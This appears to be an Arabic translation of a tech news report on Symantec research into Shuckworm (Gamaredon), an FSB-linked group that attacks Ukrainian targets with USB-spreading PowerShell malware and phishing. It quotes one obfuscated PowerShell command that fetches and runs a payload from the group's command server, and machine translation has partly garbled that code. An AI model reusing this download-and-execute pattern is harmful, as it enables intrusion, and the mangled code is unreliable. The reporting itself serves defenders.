GettyImages
قال باحثون إن قراصنة يعملون لصالح جهاز الأمن الفيدرالي الروسي شنوا هجمات إلكترونية متعددة استخدمت برمجيات خبيثة تعتمد على USB لسرقة كميات كبيرة من البيانات من أهداف أوكرانية لاستخدامها في غزوها المستمر لجارتها الأصغر.
كتب باحثون من شركة Symantec ، المملوكة الآن لشركة Broadcom ، في منشور يوم الخميس: “قد تكون قطاعات وطبيعة المنظمات والآلات المستهدفة قد سمحت للمهاجمين بالوصول إلى كميات كبيرة من المعلومات الحساسة”. “كانت هناك مؤشرات في بعض المنظمات على أن المهاجمين كانوا على أجهزة أقسام الموارد البشرية بالمنظمات ، مما يشير إلى أن المعلومات حول الأفراد العاملين في المنظمات المختلفة كانت من أولويات المهاجمين ، من بين أمور أخرى”.
المجموعة ، التي تتبعها شركة Symantec باسم Shuckworm وباحثون آخرون تسمى Gamaredon و Armageddon ، نشطة منذ عام 2014 وتم ربطها بـ FSB الروسي ، جهاز الأمن الرئيسي في ذلك البلد. تركز المجموعة فقط على الحصول على معلومات استخبارية عن أهداف أوكرانية. في عام 2020 ، قال باحثون في شركة الأمن SentinelOne إن مجموعة القرصنة “هاجمت أكثر من 5000 كيان فردي في جميع أنحاء أوكرانيا ، مع التركيز بشكل خاص على المناطق التي تنتشر فيها القوات الأوكرانية”.
في فبراير ، بدأت Shuckworm في نشر البرامج الضارة الجديدة والبنية التحتية للقيادة والتحكم التي نجحت في اختراق دفاعات العديد من المنظمات الأوكرانية في الجيش ، والخدمات الأمنية ، والحكومة في ذلك البلد. يبدو أن أعضاء المجموعة مهتمون أكثر بالحصول على معلومات تتعلق بمعلومات عسكرية حساسة يمكن إساءة استخدامها في الغزو الروسي المستمر.
كشفت هذه الحملة الجديدة عن برامج ضارة جديدة في شكل نص برمجي PowerShell ينشر Pterodo ، وهو باب خلفي تم إنشاؤه بواسطة Shuckworm. يتم تنشيط البرنامج النصي عند توصيل محركات أقراص USB المصابة بأجهزة الكمبيوتر المستهدفة. يقوم البرنامج النصي الخبيث أولاً بنسخ نفسه على الجهاز المستهدف لإنشاء ملف اختصار بامتداد rtf.lnk. الملفات لها أسماء مثل video_porn.rtf.lnk و do_not_delete.rtf.lnk و Evidence.rtf.lnk. الأسماء ، التي تكون في الغالب باللغة الأوكرانية ، هي محاولة لإغراء الأهداف لفتح الملفات حتى يقوموا بتثبيت Pterodo على الأجهزة.
يستمر البرنامج النصي في تعداد جميع محركات الأقراص المتصلة بالكمبيوتر المستهدف ونسخ نفسه إلى جميع محركات الأقراص المرفقة القابلة للإزالة ، على الأرجح على أمل إصابة أي أجهزة غير متصلة بالإنترنت عن قصد في محاولة لمنعها من يتم اختراقها.
لتغطية مساراتها ، أنشأت Shuckworm العشرات من المتغيرات وأدارت بسرعة عناوين IP والبنية التحتية التي تستخدمها للقيادة والتحكم. تستخدم المجموعة أيضًا خدمات مشروعة مثل Telegram ومنصة التدوين المصغرة Telegraph للقيادة والسيطرة في محاولة أخرى لتجنب الكشف.
عادةً ما تستخدم Shuckworm رسائل البريد الإلكتروني المخادعة كناقل أولي في أجهزة كمبيوتر الأهداف. تحتوي رسائل البريد الإلكتروني على مرفقات ضارة تتنكر كملفات ذات امتدادات ، بما في ذلك docx و. rar و. sfx و lnk و hta. غالبًا ما تستخدم رسائل البريد الإلكتروني موضوعات مثل النزاعات المسلحة والإجراءات الجنائية ومكافحة الجريمة وحماية الأطفال كإغراءات للحصول على أهداف لفتح رسائل البريد الإلكتروني والنقر على المرفقات.
قال باحثو سيمانتيك إن الكمبيوتر المصاب الذي استعادوه في الحملة كان نموذجيًا لطريقة عمله. كتبوا:
في إحدى الضحايا ، كانت أول علامة على وجود نشاط ضار هي عندما بدا أن المستخدم يفتح ملف أرشيف RAR من المحتمل أنه تم تسليمه عبر بريد إلكتروني تصيد بالرمح والذي يحتوي على مستند ضار.
بعد فتح المستند ، لوحظ تنفيذ أمر PowerShell ضار لتنزيل حمولة المرحلة التالية من خادم القيادة والتحكم للمهاجمين:
“CSIDL_SYSTEM \ cmd.exe” / c start / min “” بوويرشيل -w مخفي
“$ gt =” / get. “+[char](56 + 56) +[char](104) +[char](112) $ hosta =[char](50 + 4
8) ؛[system.net.servicepointmanager]:: servercertificatevalidationcallb
ack = {$ true}؛ $ hosta + = ‘. vafikgo.’؛ $ hosta + =[char](57 + 57) $ hosta + =[char](
60 + 57) ؛ العناوين بالدولار =[system.net.dns]:: gethostbyname ($ hosta) ؛ $ addr = $ addrs.ad
قائمة الملابس[0]؛ $ client = (new-object
net.webclient)؛ $ faddr = “HTT” + ‘ps: //’ + $ addr + $ gt؛ $ text = $ client.downloads
tring ($ faddr)؛ iex $ text “في الآونة الأخيرة ، لاحظت Symantec أن Shuckworm تستفيد من المزيد من عناوين IP في نصوص PowerShell النصية الخاصة بها. من المحتمل أن تكون هذه محاولة للتهرب من بعض طرق التتبع التي يستخدمها الباحثون.
تواصل Shuckworm أيضًا تحديث تقنيات التشويش المستخدمة في نصوص PowerShell النصية الخاصة بها في محاولة لتجنب الاكتشاف ، مع ملاحظة ما يصل إلى 25 نوعًا جديدًا من البرامج النصية للمجموعة شهريًا بين يناير وأبريل 2023.
يتضمن منشور الخميس عناوين IP ، والتجزئة ، وأسماء الملفات ، وغيرها من مؤشرات الاختراق التي يمكن للأشخاص استخدامها لاكتشاف ما إذا كان قد تم استهدافهم. يحذر المنشور أيضًا من أن المجموعة تشكل تهديدًا يجب أن تأخذ الأهداف على محمل الجد.
وكتبوا: “يوضح هذا النشاط أن تركيز Shuckworm الدؤوب على أوكرانيا مستمر”. “يبدو من الواضح أن الجماعات الهجومية الروسية المدعومة من الدولة القومية تواصل استهداف الأهداف الأوكرانية في محاولات للعثور على البيانات التي قد تساعد عملياتها العسكرية.”
اكتشاف المزيد من عرب نيوز للتقنية
اشترك للحصول على أحدث التدوينات المرسلة إلى بريدك الإلكتروني.
